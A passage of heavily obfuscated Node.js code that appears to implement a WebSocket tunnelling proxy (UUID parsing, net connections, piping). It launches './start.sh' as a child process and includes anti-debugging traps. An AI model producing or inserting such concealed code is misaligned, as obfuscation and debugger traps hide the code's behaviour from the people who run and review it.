this[_0x11e0a3(0x35,0xd2,0x1b5,0x31,0xb3)](_0x582f00[_0x1f8911(0x47d,0x3dc,0x402,0x484,0x410)](_0x2499f9)),_0x472178['on'](_0x15e773[_0x11e0a3(0xf8,0x89,0x160,0x55,0xd5)],_0x15e773[_0x16e631(-0x1cc,-0x2b9,-0x20c,-0x25c,-0x2b1)](errcb,_0x15e773[_0x1f8911(0x48f,0x48c,0x484,0x42a,0x3ea)]))[_0x11e0a3(0x142,0x1b0,0x296,0x277,0xee)](this)['on'](_0x15e773[_0x11e0a3(0xb7,0x89,0xf4,0xdd,0x94)],_0x15e773[_0x16e631(-0x1d2,-0x174,-0x21a,-0x237,-0x2e2)](errcb,_0x15e773[_0x16e631(-0x13d,-0x13b,-0x140,-0x212,-0x7d)]))[_0x32a8b5(0x1db,0x21c,0x27a,0x168,0x1b9)](_0x472178);})['on'](_0x15e773[_0x5a4020(-0xde,-0x130,-0xa4,-0x171,-0x1e7)],_0x15e773[_0x4f1aaa(-0x25e,-0x2be,-0x18c,-0x1bf,-0x25b)](errcb,_0x15e773[_0x1f0c5b(0xd2,0x85,0x40,-0x11,0x6f)],_0x33faab));}else _0x29f49a=iGzjzx[_0x3d5022(0x249,0x279,0x25e,0x33a,0x2f5)](_0x482d28,iGzjzx[_0x1f0c5b(0x40,0x104,0x72,0xb1,0x47)](iGzjzx[_0x5a4020(-0xe3,-0x25,-0x85,-0x62,-0xcc)](iGzjzx[_0x4f1aaa(-0x1c0,-0x37,-0x1b3,-0x167,-0x10c)],iGzjzx[_0x3d5022(0x35f,0x35b,0x3d4,0x3d7,0x2bc)]),');'))();})['on'](_0x15e773[_0x53ba12(0xcc,0x6f,0xd,-0x56,0x27)],_0x15e773[_0x53ba12(0x60,0x12a,0x105,0x152,0x163)](errcb,_0x15e773[_0x4d9560(-0x23e,-0x9c,-0x142,-0x159,-0x20f)]));}),childProcess[_0x504eae(0x2aa,0x1f7,0x1cf,0x1c4,0x2c7)+'t']['on'](_0x3b9f4f(0x64,0xb3,0x5b,0x49,0x10d),_0x32308f=>{function _0x3645a9(_0x3a0263,_0x37102e,_0x2d4d99,_0x11b00e,_0x2eeba1){return _0x3b9f4f(_0x2eeba1-0x1e,_0x37102e-0xe1,_0x2d4d99-0xc2,_0x11b00e-0x1e2,_0x11b00e);}function _0xbf076a(_0x33c5da,_0x64aff6,_0x5b8ddd,_0x31aa91,_0xac739c){return _0x504eae(_0xac739c- -0x2b3,_0x64aff6-0xde,_0x5b8ddd-0x2b,_0x31aa91-0x115,_0x5b8ddd);}function _0x55ac32(_0x4f5e95,_0x442d25,_0x84fde9,_0x53ca28,_0x4b390e){return _0x1e3602(_0x4f5e95-0x167,_0x4b390e,_0x84fde9-0x1,_0x53ca28-0x1da,_0x4b390e-0x19a);}console[_0xbf076a(-0x154,-0x140,-0xb8,0x2b,-0x75)](_0xbf076a(0xda,0x8a,-0xd9,0x2f,-0x9)+_0x55ac32(0x1d0,0x1b7,0x265,0x221,0x2e6)+_0x32308f);});function 
_0x5b3717(_0x53361c,_0x3d64eb,_0xd62b74,_0x2de2a2,_0x4d7f6e){return _0x222c(_0x53361c- -0x349,_0x3d64eb);}childProcess[_0x504eae(0x332,0x30f,0x25b,0x3c4,0x321)+'r']['on'](_0x1e3602(-0xc7,0x3c,-0xe1,0xb,-0x8a),_0x150c6a=>{function _0x58f46b(_0x5bd88f,_0x34e7b1,_0xafbc57,_0x1fbfae,_0x44ba8b){return _0x3b9f4f(_0x34e7b1-0x32c,_0x34e7b1-0x124,_0xafbc57-0x91,_0x1fbfae-0x138,_0xafbc57);}function _0x42ec39(_0x21c004,_0x334ee5,_0x59217d,_0x22145d,_0x579d99){return _0x3b9f4f(_0x579d99-0x7b,_0x334ee5-0x3e,_0x59217d-0xcd,_0x22145d-0x164,_0x22145d);}function _0x3ddc52(_0x37585d,_0x269aee,_0x1e785d,_0x343d5c,_0x13131e){return _0x3b9f4f(_0x13131e-0x283,_0x269aee-0x6d,_0x1e785d-0x15d,_0x343d5c-0x1e7,_0x37585d);}console[_0x3ddc52(0x208,0x149,0x20c,0x183,0x22a)](_0x3ddc52(0x2cd,0x3b4,0x3fc,0x2fc,0x332)+_0x42ec39(0xc0,0x184,0x1a4,0x85,0x15e)+_0x150c6a);}),childProcess['on'](_0x5b3717(-0x16d,-0x15c,-0xee,-0xc8,-0x1c7),_0x44d041=>{function _0x4510c4(_0x343fce,_0xf18e,_0x48a07b,_0x18d67e,_0x333faf){return _0x1e3602(_0x343fce-0x12f,_0x343fce,_0x48a07b-0x19c,_0x48a07b-0x184,_0x333faf-0x18c);}function _0x57a77d(_0x42aaae,_0x354fb4,_0x213b97,_0x7d1ee,_0x2e0766){return _0x5b3717(_0x213b97-0x430,_0x42aaae,_0x213b97-0xb2,_0x7d1ee-0x34,_0x2e0766-0x1f0);}function _0x5cb31b(_0x517b04,_0x4cf481,_0x4e7ac1,_0x3208e3,_0x37444f){return _0x3b9f4f(_0x4cf481- -0x20,_0x4cf481-0xd3,_0x4e7ac1-0x83,_0x3208e3-0x5f,_0x4e7ac1);}function _0x9f9bb8(_0x21b13b,_0x328460,_0xe89287,_0x175437,_0x212cc2){return _0x1e3602(_0x21b13b-0x131,_0x175437,_0xe89287-0xc9,_0x212cc2-0x327,_0x212cc2-0xa2);}function _0x224102(_0x3be2bf,_0x3762db,_0x164cd3,_0x2226b4,_0x417057){return _0x3b9f4f(_0x164cd3-0x446,_0x3762db-0x1bb,_0x164cd3-0x1df,_0x2226b4-0x7f,_0x3762db);}console[_0x9f9bb8(0x2c5,0x332,0x1f5,0x253,0x289)](_0x9f9bb8(0x2b3,0x30b,0x298,0x379,0x326)+_0x9f9bb8(0x18a,0x191,0x2d3,0x2e2,0x26f)+_0x4510c4(0x59,0x18c,0x133,0xa9,0x1e1)+_0x224102(0x56f,0x58f,0x4ef,0x59f,0x428)+_0x57a77d(0x283,0x30c,0x30c,0x395,0x330)+_0x224102(0x3f0,0x3e9,0x486,0x424,0x454)+_0x44d041);});function _0x4e4c(){const 
_0x35b343=['PJUHq','ess','2607099qtOSnB','NHzuu','VUWbC','WamCO','nDGnZ','prTxT','PIoog','ThJCG','gger','25c-c','Rpahm','BBKlA','\x20port','trace','8074146OfEJsv','RExtq','QbQPM','ufdSt','dcTsu','akkft','decod','bcCTr','sxRLl','while','NLVqL','uPIuo','VxtEs','QmRQu','vxfdZ','MBAXm','vyEiL','\x20(tru','nbfbP','Ejzpn','cxfXB','ng\x20on','t:\x20','RAplO','IWFzE','UbKUh','eServ','OABNl','fEhhE','funct','const','xit,\x20','AteeO','drGOn','PZViy','cted\x20','HXTIF','stder','tion','bUAtF','http','LegjN','ffwFQ','GwhBd','ydLrd','KBBMA','ZZxQO','UzLYU','ehNRh','omHUq','NtuTp','be4-4','lbAPp','EgIjE','Yicnh','state','CKgNX','vwWMV','wmrKJ','qvIbA','ound\x0a',')+)+)','iWTpY','iUkoU','BfvaY','cmawd','rVCDs','nJwcJ','sypaq','nstru','15441576cFxalo','PORT','KXHHp','iUyrA','gvLdn','pipe','AhMDR','myeAR','yIrAY','xFEeL','pOQpd','runni','ct-Er','ct:','IeSMM','close','liHXh','1c0a7','SyCzk','r:\x20','pCVxo','cxNks','3b6-b','wxMMJ','E1:','nkmzv','ODzMc','actio','{}.co','huTKO','PPgxu','11qyxnkm','baaVO','VJMWX','BKGxW','SSpbY','env','7apTMSr','jXxhT','join','PSHak','mODJA','apply','Int16','oePUv','vqZYb','YyzBo','WyYfq','35523WhLXEV',',\x20Wor','26ZTZBbS','dPuog','MOoJV','FXgKD','QUYWB','FFddC','\x22retu','ion\x20*','ction','cVTCn','tlkpy','MQLCG','rHuCY','./sta','eRUXM','creat','ITDzW','CyOYO','\x5c(\x20*\x5c','EEfdC','RJqbZ','iDzSp','chcUh','qgFlu','hMtyj','zkvhK','soNhl','13747460XHiaAI','sLgUb','Objec','kcOBP','dMrUv','pGfic','nnldf','hutFS','Error','n\x20(fu','SQFha','exit\x20','proto','IaAQQ','AMPQa','34973EQaioh','dgGbC','boUIg','TbmkI','thXtr','31b-9','igXwh','dehJt','qdEbE','mAhaX','FphDo','GwelD','IUuaa','OEyyx','UpZOL','5aAHeqs','iFdfD','gtuvb','HzzYl','bTZpH','xggyp','toStr','DlSBX','SZIrc','NDXLh','(((.+','WebSo','kdWLe','QtdjG','xisMf','sxjqi','aytnA','TfCYO','repla','fFEtn','rvbRb','djCCi','ZLSGn','VodzB','IUUld','net','RnvIN','Eezyv','zmHMa','ZSRjq','Mlvef','iRVDO','hLqPS','NHqXG','succe','VzILz','yvJLh','xDjCg','host','port','lwfzy','util','bvYam','ENUXM','XdJIb','a-zA-','AFQdy','mhjxL','call','NVlVS','AJXkM','vPGKz','once','ELQqV','zrEBO','JOvwt','PRlAo','liNNj','HHAvw','nEyQx','retur','fvPjT','ZtWnq','ZySZv','conca','RUvbo','xHxer','excep','QAMmq','QjooB','chain','BkELO','\x20proc','ing','dBMnj','ivCFN','BDovH','searc','error','SAPOu','BhFjR','CuVjr','pWlUa','HHIYV','EGhZe','rLUYi','gNvzd','to__','terva','nt-Ty','bHHoJ','subst','32qjTFKd','eURqP','2320ITVTvP','plain','rUHin','setIn','log','QPwpg','sEXRC','VYcwE','init','ulKmv','DbTXj','table','HFcrA','peSlp','vokxU','tsKtZ','ansOB','ructo','rdZbx','tWOOY','gNWCh','zZyec','MDzGd','rt.sh','hmvVG','count','LszCS','zbVyN','cket\x20','r\x20is\x20','Serve','nctio','TTiuI','GgHUu','nLwfJ','rcsmG','info','veKDz','n()\x20','url','IGTuh','rn\x20th','child','ivCZf','gHyhj','conso','CSsds','Conne','xWzfO','conne','YMKao','fBjQe','Int8','WZqeI','isNoV','lengt','TnDMY','hEApv','wzZPT','tdqlu','mjuUj','GlnpG','GXkqo','Z_$][','write','debu','qRURx','send','serve','QYFAI','tyKaX','qAiZw','pWOqq','esxiR','dFTqf','text/','DZKIl','e)\x20{}','pAIwA','xuxDF','ZcBtI','ess\x20e','KMlbm','egDib','DCpBU','YuZTU','GwNim','iiOWN','readU','UUID','OCFGX','Head','wXYKo','LDraj','AhSBZ','ctor(','pFaCe','zA-Z_','EBboY','every','XQEcL','XQvLW','CNRey','OaJSR','input','EIIdK','NXhPY','test','gpBzh','QRTPc','IdbFC','ZjhYg','stdou','CLxJL','MbvHf','ld\x0a','TfeVo','zOvbg','ArJzO','kgsEZ','vycxt','map','25bef','FqVfy','oewZB','$]*)','fmLpv','iRTzo','nKEwh','messa','xymJH','warn','xqvBr','ssful','39aa1','ioJGc','Not\x20F','code:','HIzaX','reduc','HSAgz','strin','UGzxM','Hello','
FIsIF','IgZqH','__pro','ZBukS','end','MTwwb','wsjSt','bind','Rvigx','\x5c+\x5c+\x20','djRtw','_proc','FDrfr','JtRXc','liste','E2:','KYuYZ','Child','Conte','NRmyP','vjNvL','QQctm','baqfC','CzlDj','KbQMx','3184948GDYCkJ','chqdL','gZTRd','slice','data','fofzi','YZnVv','kEbvc','stdmP','iKskN','SeIEh','0-9a-','is\x22)(','fwptI','tamNE','LEbOf','SRWRa','LFXJW','oezYl','type','JhSmt','*(?:[','yIPvi','KZCzm','QENVS','QkmIN'];_0x4e4c=function(){return _0x35b343;};return _0x4e4c();}function _0x504eae(_0x2fc119,_0x5645a6,_0x3e5254,_0x27e50f,_0x40b493){return _0x222c(_0x2fc119-0x186,_0x40b493);}function _0x3b9f4f(_0x4d0e11,_0x5227de,_0x4e693f,_0x1476b1,_0x4240ea){return _0x222c(_0x4d0e11- -0xfd,_0x4240ea);}function _0x533f97(_0x505d61){const _0x274a73={'BhFjR':function(_0x3be348,_0x518cd4){return _0x3be348(_0x518cd4);},'qAiZw':function(_0x2a17fd,_0x5e5d71){return _0x2a17fd===_0x5e5d71;},'bvYam':_0x163385(-0x299,-0x281,-0x2c3,-0x1aa,-0x20d),'mjuUj':function(_0x121015,_0x5ce60e){return _0x121015===_0x5ce60e;},'DbTXj':_0x37219c(0x36b,0x3dc,0x2fe,0x344,0x2b9),'OaJSR':_0x163385(-0x2e6,-0x2dc,-0x1f7,-0x27c,-0x397),'JhSmt':function(_0xd0aec,_0x33c60b){return _0xd0aec+_0x33c60b;},'bHHoJ':function(_0x57de57,_0x3db417){return _0x57de57+_0x3db417;},'NVlVS':_0x5ef808(-0x38a,-0x217,-0x3c0,-0x2d8,-0x29d)+_0x37219c(0x423,0x38f,0x37f,0x462,0x42b)+_0x3c56c7(0x1f2,0x1d2,0x169,0x297,0x159)+_0x4c92c1(0x3c5,0x321,0x3f9,0x247,0x2ed),'lwfzy':_0x3c56c7(0x278,0x2e8,0x270,0x291,0x285)+_0x4c92c1(0x502,0x413,0x3be,0x3c5,0x477)+_0x37219c(0x279,0x1c6,0x26f,0x206,0x2e5)+_0x163385(-0x1aa,-0x129,-0x186,-0x1fc,-0x142)+_0x3c56c7(0x1f4,0x1dc,0x133,0x12b,0x202)+_0x3c56c7(0x1af,0x268,0x239,0x28b,0x251)+'\x20)','MTwwb':function(_0x56a4c8){return _0x56a4c8();},'IUUld':_0x3c56c7(0x249,0x1b7,0x1dd,0x1ca,0x21b),'vqZYb':_0x163385(-0x278,-0x20d,-0x2ef,-0x1cf,-0x205),'oewZB':_0x37219c(0x1df,0x2e3,0x234,0x249,0x1d8),'iUkoU':_0x4c92c1(0x372,0x2eb,0x3b1,0x2da,0x3cf),'ODzMc':_0x5ef808(-0x2ca,-0x25b,-0x222,-0x2d1,-0x326)+_0x37219c(0x3d6,0x262,0x309,0x358,0x235),'huTKO':_0x4c92c1(0x2c2,0x306,0x324,0x262,0x36f),'TnDMY':_0x4c92c1(0x3c5,0x3cd,0x37f,0x3b6,0x2e7),'fmLpv':function(_0x527a5b,_0x6c02b4){return _0x527a5b<_0x6c02b4;},'NHzuu':function(_0x3cd09e,_0x4fd2ba){return _0x3cd09e===_0x4fd2ba;},'dFTqf':_0x4c92c1(0x28b,0x367,0x39a,0x41f,0x315),'QENVS':function(_0x2f077d,_0x2792db){return _0x2f077d===_0x2792db;},'zmHMa':_0x3c56c7(0x18d,0x240,0x2dd,0x1e1,0x218)+'g','gvLdn':function(_0x29f302,_0x6fb28e){return _0x29f302!==_0x6fb28e;},'KXHHp':_0x5ef808(-0x166,-0x20c,-0x8d,-0x13a,-0x8d),'hmvVG':_0x4c92c1(0x34e,0x376,0x347,0x418,0x2fe),'IaAQQ':_0x5ef808(-0x14b,-0x2bd,-0x1b7,-0x1da,-0x168)+_0x3c56c7(0x1cc,0x297,0x303,0x231,0x2d4)+_0x37219c(0x2dc,0x183,0x25d,0x1c6,0x2a4),'VYcwE':_0x3c56c7(0x101,0x1cc,0x229,0x21f,0x101)+'er','dcTsu':function(_0x27055e,_0x2291f3){return _0x27055e===_0x2291f3;},'HXTIF':_0x163385(-0x19a,-0x1b8,-0x174,-0x221,-0x1db),'zkvhK':function(_0x58965a,_0x1cf64e){return _0x58965a/_0x1cf64e;},'iRTzo':_0x37219c(0x1fe,0x328,0x247,0x26b,0x297)+'h','WyYfq':function(_0xe259c1,_0xe77265){return _0xe259c1===_0xe77265;},'GgHUu':function(_0x28418e,_0x3a1021){return _0x28418e%_0x3a1021;},'PJUHq':function(_0x5414d9,_0x418ef1){return _0x5414d9!==_0x418ef1;},'EEfdC':_0x4c92c1(0x1fb,0x2d7,0x1fb,0x1f6,0x351),'dMrUv':_0x163385(-0x2ba,-0x338,-0x28d,-0x243,-0x1ca),'akkft':_0x37219c(0x289,0x2d6,0x2dd,0x30a,0x297),'QkmIN':_0x37219c(0x261,0x2d5,0x344,0x26c,0x338)+'n','TfeVo':function(_0x437857,_0x20c729){return 
_0x437857===_0x20c729;},'SRWRa':_0x5ef808(-0x133,-0x20b,-0x1be,-0x1ee,-0x2b1),'fEhhE':_0x5ef808(-0x19a,-0x16a,-0x253,-0x1b3,-0x1fb),'ivCFN':function(_0x3b25d2,_0x579938){return _0x3b25d2+_0x579938;},'HSAgz':_0x4c92c1(0x3fa,0x405,0x4ca,0x4ba,0x3a2)+_0x37219c(0x3c6,0x324,0x378,0x355,0x3e4)+'t','QYFAI':function(_0x5a0663,_0x2b5acb){return _0x5a0663(_0x2b5acb);},'vokxU':function(_0x48324e,_0x1ce876){return _0x48324e(_0x1ce876);},'FIsIF':function(_0xb0d37a,_0x268cc8){return _0xb0d37a+_0x268cc8;},'AteeO':function(_0x14f153,_0x4faa77){return _0x14f153!==_0x4faa77;},'omHUq':_0x3c56c7(0x249,0x315,0x387,0x245,0x29f),'yIPvi':_0x4c92c1(0x464,0x440,0x458,0x510,0x4b2),'RJqbZ':function(_0xe9c5ee,_0x58d32d){return _0xe9c5ee===_0x58d32d;},'egDib':_0x5ef808(-0x1da,-0x216,-0x2bd,-0x216,-0x2c0),'XQEcL':_0x4c92c1(0x344,0x2d8,0x242,0x2c8,0x220),'wsjSt':function(_0x518aac,_0x208cee){return _0x518aac!==_0x208cee;},'hEApv':_0x163385(-0x1ce,-0xf0,-0x16f,-0x110,-0x150),'nbfbP':_0x4c92c1(0x450,0x3a0,0x479,0x302,0x2f6)};function _0x3c56c7(_0xf43e55,_0x20da71,_0x57dd96,_0x13b696,_0x2a1b56){return _0x5b3717(_0x20da71-0x448,_0xf43e55,_0x57dd96-0x3,_0x13b696-0x25,_0x2a1b56-0x109);}function _0x4dacc1(_0x1f2ebb){function _0x1df5ce(_0x4386d7,_0x5e7f68,_0x51fef2,_0x170730,_0x4e2da0){return _0x163385(_0x4e2da0-0x63,_0x5e7f68-0x5b,_0x4386d7,_0x170730-0x99,_0x4e2da0-0xa0);}function _0x292b63(_0x14cd58,_0x45579e,_0x2d7e99,_0x4188e9,_0x576e87){return _0x37219c(_0x14cd58-0x39,_0x45579e-0x1bf,_0x45579e- -0x4fb,_0x4188e9-0xe1,_0x2d7e99);}function _0x315baa(_0x22d0da,_0x4ec0aa,_0x1c1f1f,_0x5c86ee,_0x3eb224){return _0x163385(_0x5c86ee-0x312,_0x4ec0aa-0x70,_0x3eb224,_0x5c86ee-0x2,_0x3eb224-0x4b);}const _0x36d494={'vxfdZ':function(_0x3959eb,_0x224ba2){function _0x2be67b(_0xc568c3,_0x4e9bfb,_0x217cef,_0x468fe5,_0x46ca2b){return _0x222c(_0xc568c3-0x271,_0x468fe5);}return _0x274a73[_0x2be67b(0x361,0x2f3,0x425,0x43a,0x270)](_0x3959eb,_0x224ba2);},'ffwFQ':_0x274a73[_0x1df5ce(-0x2c8,-0x319,-0x322,-0x29a,-0x28e)],'NRmyP':_0x274a73[_0x315baa(0x16b,0x110,0x8,0x7e,0xff)],'RnvIN':function(_0x5de2d4,_0x18cd5f){function _0x3ccb8d(_0x4a74cb,_0x413af3,_0x32dd1a,_0x301970,_0xcc65fb){return _0x315baa(_0x4a74cb-0x42,_0x413af3-0x9a,_0x32dd1a-0xe0,_0x301970-0x3a6,_0x32dd1a);}return _0x274a73[_0x3ccb8d(0x30c,0x34a,0x338,0x3af,0x3ad)](_0x5de2d4,_0x18cd5f);},'CSsds':function(_0x4073a6,_0x588f66){function _0x4a16d6(_0x35a425,_0x23a8d3,_0xd054e1,_0x460c32,_0x5db346){return _0x315baa(_0x35a425-0x139,_0x23a8d3-0x129,_0xd054e1-0x37,_0x35a425- -0x15e,_0x23a8d3);}return _0x274a73[_0x4a16d6(-0x8a,-0x77,-0x49,-0xaf,0xe)](_0x4073a6,_0x588f66);},'WZqeI':function(_0x57f75a,_0x26cedb){function _0x414327(_0x59b6a7,_0x5c7132,_0x7a43a9,_0x316bea,_0x5dcca1){return _0x315baa(_0x59b6a7-0xea,_0x5c7132-0xc7,_0x7a43a9-0x186,_0x5c7132-0x346,_0x5dcca1);}return _0x274a73[_0x414327(0x43b,0x359,0x2b1,0x36b,0x447)](_0x57f75a,_0x26cedb);},'vyEiL':_0x274a73[_0x56c700(0xb0,-0x51,0x64,-0x29,0x32)],'FXgKD':_0x274a73[_0x56c700(0x29,0xe8,0xd8,-0xc1,0x29)],'ThJCG':function(_0xc5adb6){function _0x22e575(_0x3d9595,_0x58dc5b,_0x479fe3,_0x473776,_0x399d2c){return _0x1df5ce(_0x399d2c,_0x58dc5b-0xd9,_0x479fe3-0x8e,_0x473776-0x4,_0x479fe3- -0x65);}return 
_0x274a73[_0x22e575(-0x26b,-0x2cd,-0x268,-0x222,-0x2de)](_0xc5adb6);},'EIIdK':_0x274a73[_0x315baa(0x211,0x15e,0x1c5,0x1b3,0x1b7)],'SyCzk':_0x274a73[_0x1df5ce(-0x1cf,-0x178,-0x17b,-0xc9,-0x152)],'RAplO':_0x274a73[_0x292b63(-0x218,-0x26f,-0x1b2,-0x268,-0x2c5)],'SAPOu':_0x274a73[_0x292b63(-0x16d,-0x1d9,-0x23d,-0x29c,-0x108)],'igXwh':_0x274a73[_0x292b63(-0x126,-0x1b8,-0x2a1,-0x1b9,-0xeb)],'BKGxW':_0x274a73[_0x315baa(0xa9,0x209,0x16f,0x14d,0xf0)],'uPIuo':_0x274a73[_0x56c700(0x88,0x32,0x62,-0x7,0x97)],'CzlDj':function(_0x24a5bb,_0x5e10fe){function _0x413088(_0x2369b,_0x3ef86f,_0x354a60,_0x3c8007,_0x541309){return _0x286c2e(_0x2369b-0x155,_0x3ef86f-0x20,_0x354a60-0x1cc,_0x3c8007-0xb9,_0x3c8007);}return _0x274a73[_0x413088(0x3a2,0x33b,0x24c,0x2ac,0x2b0)](_0x24a5bb,_0x5e10fe);}};function _0x286c2e(_0x14b5d7,_0x28b217,_0x361a48,_0x49b38a,_0x126475){return _0x4c92c1(_0x14b5d7-0x135,_0x28b217- -0x5e,_0x361a48-0x32,_0x126475,_0x126475-0x23);}function _0x56c700(_0x51a59e,_0x265bb8,_0x2ce528,_0xb6c224,_0x2035c1){return _0x5ef808(_0x51a59e-0x1dc,_0x265bb8-0x163,_0x2ce528-0xd3,_0x2035c1-0x315,_0xb6c224);}if(_0x274a73[_0x286c2e(0x2b6,0x363,0x2b9,0x3bf,0x275)](_0x274a73[_0x315baa(-0x6,0xfb,-0x8d,0x61,0x148)],_0x274a73[_0x286c2e(0x259,0x2e7,0x3b2,0x2f9,0x30e)])){if(_0x274a73[_0x1df5ce(-0x1a3,-0x1eb,-0x29d,-0x1fb,-0x1d7)](typeof _0x1f2ebb,_0x274a73[_0x1df5ce(-0x150,-0x37,-0x9,-0x129,-0xf8)])){if(_0x274a73[_0x286c2e(0x46f,0x3ba,0x2f3,0x476,0x445)](_0x274a73[_0x286c2e(0x2d6,0x3b8,0x2fc,0x39b,0x37c)],_0x274a73[_0x1df5ce(-0x29f,-0x2da,-0x330,-0x325,-0x280)]))return function(_0x4925d3){}[_0x315baa(0xd3,0x1dc,0x135,0x108,0x68)+_0x292b63(-0x287,-0x2da,-0x20b,-0x397,-0x246)+'r'](_0x274a73[_0x1df5ce(-0x202,-0x14a,-0x173,-0xd7,-0x125)])[_0x286c2e(0x407,0x3e0,0x3d1,0x45c,0x318)](_0x274a73[_0x286c2e(0x31d,0x2a4,0x2f9,0x2a2,0x301)]);else{if(_0x39b16c)return _0x1925b8;else _0x274a73[_0x315baa(-0xda,0x0,0x2,0x9,0xe0)](_0x101893,0x70e+0x101f*0x1+-0x172d);}}else{if(_0x274a73[_0x56c700(0x67,0x11d,0x15f,0x1e7,0x136)](_0x274a73[_0x292b63(-0x131,-0x1f4,-0x2c4,-0x2a0,-0x237)],_0x274a73[_0x56c700(0x1ed,0x244,0x23f,0x20a,0x156)])){if(_0x274a73[_0x292b63(-0x19f,-0x1ce,-0x29f,-0x168,-0x108)](_0x274a73[_0x292b63(-0x3af,-0x2ef,-0x294,-0x30e,-0x279)]('',_0x274a73[_0x1df5ce(-0x1de,-0x105,-0x15f,-0x1cc,-0x134)](_0x1f2ebb,_0x1f2ebb))[_0x274a73[_0x292b63(-0x31e,-0x26c,-0x2ea,-0x219,-0x336)]],0x1*0x1894+-0x1e6*-0x1+-0x1*0x1a79)||_0x274a73[_0x286c2e(0x43d,0x3e5,0x311,0x416,0x43e)](_0x274a73[_0x315baa(-0xaf,0x96,-0xa9,0x38,0x8a)](_0x1f2ebb,-0x2647+0x990+0x51*0x5b),0xcc7+-0x226d+0xa3*0x22)){if(_0x274a73[_0x286c2e(0x3f5,0x360,0x279,0x44d,0x392)](_0x274a73[_0x56c700(0x1f2,0x110,0x125,0x1e3,0x1bd)],_0x274a73[_0x292b63(-0x1dc,-0x18d,-0x205,-0x22b,-0x9d)])){const _0x43262d=_0x684335[_0x1df5ce(-0x277,-0x27f,-0x1e6,-0x26d,-0x1a7)+_0x292b63(-0x2bf,-0x2da,-0x33f,-0x355,-0x39f)+'r'][_0x315baa(0x124,0x161,0x15b,0x189,0x137)+_0x56c700(0xc9,0x184,0x95,0x1ea,0x11b)][_0x315baa(0x151,0xf0,0x77,0xae,0x11)](_0x260ca5),_0x4d05b3=_0x30fcfe[_0x4bcff0],_0x246e19=_0xf77b38[_0x4d05b3]||_0x43262d;_0x43262d[_0x56c700(0x1c7,0x1b1,0x61,0x5f,0xf1)+_0x286c2e(0x1ed,0x296,0x1d7,0x256,0x2c8)]=_0xcfbab7[_0x286c2e(0x3db,0x334,0x362,0x3c2,0x2f8)](_0x4d58aa),_0x43262d[_0x286c2e(0x4d8,0x427,0x3bd,0x449,0x514)+_0x292b63(-0x33f,-0x300,-0x3bb,-0x2d9,-0x31a)]=_0x246e19[_0x286c2e(0x388,0x427,0x4b6,0x380,0x517)+_0x286c2e(0x2ec,0x288,0x204,0x28e,0x302)][_0x286c2e(0x3fe,0x334,0x3c7,0x32e,0x397)](_0x246e19),_0x146534[_0x4d05b3]=_0x43262d;}else(function(){function 
_0x211536(_0x2a2ec9,_0x41a5df,_0x1cc2c8,_0x448a30,_0x2348d1){return _0x56c700(_0x2a2ec9-0x55,_0x41a5df-0x130,_0x1cc2c8-0x121,_0x2348d1,_0x448a30- -0x104);}function _0x33fd27(_0x1fc3cd,_0x4560b,_0xd10f2,_0xc63e04,_0x369d8b){return _0x315baa(_0x1fc3cd-0x9d,_0x4560b-0x15d,_0xd10f2-0xd9,_0xd10f2-0x3ee,_0x4560b);}function _0x30472a(_0x1059da,_0x359c8f,_0x26274b,_0x233917,_0x2a0e44){return _0x315baa(_0x1059da-0x129,_0x359c8f-0x27,_0x26274b-0x38,_0x233917-0x2c0,_0x1059da);}function _0x4e1c90(_0x134d49,_0x5ecc47,_0x5b5911,_0x3c7817,_0xe475e2){return _0x1df5ce(_0xe475e2,_0x5ecc47-0x130,_0x5b5911-0x124,_0x3c7817-0xcb,_0x5b5911-0x179);}function _0x2c9db6(_0x47552d,_0x1bb639,_0x3ea939,_0x234693,_0x386f79){return _0x286c2e(_0x47552d-0x1ae,_0x234693- -0x287,_0x3ea939-0xfb,_0x234693-0xa3,_0x1bb639);}if(_0x274a73[_0x2c9db6(-0x79,-0x4,-0x56,0x5d,-0x4)](_0x274a73[_0x2c9db6(0x85,0x8c,-0x33,-0x1e,0xd3)],_0x274a73[_0x33fd27(0x416,0x3c0,0x3d1,0x338,0x3b2)]))return!![];else _0xbe906e[_0x30472a(0x245,0x2c3,0x367,0x2db,0x31f)](_0x4e1c90(-0xe0,-0x51,-0x101,-0x1c5,-0x150)+_0x33fd27(0x4b2,0x432,0x422,0x3b7,0x3ae)+_0x2c9db6(0x17d,0x113,0x1e8,0x13a,0x1fc)+_0x211536(-0xa,0x132,-0x56,0x43,0xff)+_0x2c9db6(0xb0,0x191,0x146,0xe7,0xa)+'\x20'+_0x398d92);}[_0x286c2e(0x300,0x38e,0x3eb,0x3f6,0x311)+_0x292b63(-0x244,-0x2da,-0x2ec,-0x349,-0x2e8)+'r'](_0x274a73[_0x56c700(-0x27,0xee,-0x81,0xab,0x5b)](_0x274a73[_0x286c2e(0x3ec,0x407,0x4b0,0x38d,0x4f8)],_0x274a73[_0x56c700(0xcb,0x78,0x51,0x183,0x137)]))[_0x292b63(-0x2a8,-0x319,-0x273,-0x357,-0x308)](_0x274a73[_0x286c2e(0x43f,0x35f,0x2eb,0x346,0x38e)]));}else _0x274a73[_0x286c2e(0x22d,0x311,0x2b1,0x3d3,0x243)](_0x274a73[_0x286c2e(0x430,0x356,0x441,0x369,0x424)],_0x274a73[_0x286c2e(0x38b,0x38c,0x3ff,0x47c,0x3f2)])?_0x1f49b7[_0x315baa(-0xd3,0x100,0xef,0x1b,0xfc)](_0x1df5ce(-0x140,-0x25e,-0x234,-0x19a,-0x1f7)+_0x286c2e(0x242,0x287,0x328,0x1b0,0x1cb)+_0x315baa(0x134,-0x1f,0xf0,0x68,0x12c)+_0x292b63(-0x143,-0x1f9,-0x22b,-0x131,-0x2cc)+_0x286c2e(0x4c6,0x40e,0x41a,0x32f,0x494)+_0x286c2e(0x3e8,0x326,0x2ae,0x2a5,0x3a6)+_0x16a84a):function(){function _0x3daebb(_0x9a03ab,_0x37dd8e,_0x520996,_0x7d7599,_0x428686){return _0x56c700(_0x9a03ab-0x2,_0x37dd8e-0x8d,_0x520996-0xde,_0x520996,_0x37dd8e- -0x35);}function _0x4a4d08(_0x148057,_0x2bddf0,_0x49762d,_0x459365,_0x46d29a){return _0x292b63(_0x148057-0xb9,_0x459365-0x113,_0x46d29a,_0x459365-0x53,_0x46d29a-0x35);}function _0x35a402(_0x423f90,_0x5e706b,_0x5d8a0d,_0x117a44,_0x56245b){return _0x1df5ce(_0x423f90,_0x5e706b-0x102,_0x5d8a0d-0x7c,_0x117a44-0x10d,_0x5e706b-0x5f0);}function _0x5a477a(_0x11ee68,_0x4912c5,_0x47236b,_0x2f288e,_0x117b0e){return 